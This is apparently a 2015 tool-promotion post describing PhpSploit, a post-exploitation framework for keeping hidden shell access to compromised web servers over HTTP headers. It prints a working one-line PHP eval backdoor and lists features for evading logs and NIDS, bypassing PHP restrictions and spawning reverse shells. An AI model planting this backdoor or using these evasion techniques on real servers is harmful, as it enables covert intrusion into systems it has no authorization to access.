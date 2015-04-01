PhpSploit - Furtive Post-Exploitation Framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server.

It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

PhpSploit Screenshot

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Features:

  • Efficient: More than 20 plugins to automate post-exploitation tasks
    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids
    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features
    • Detailed help for any command or option (type help)
    • Cross-platform on both the client and the server.
    • Powerful interface with completion and multi-command support
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported Platforms (as attacker):

  • GNU/Linux
  • Mac OS X

Supported Platforms (as target):

  • GNU/Linux
  • BSD Like
  • Mac OS X
  • Windows NT


Download PhpSploit

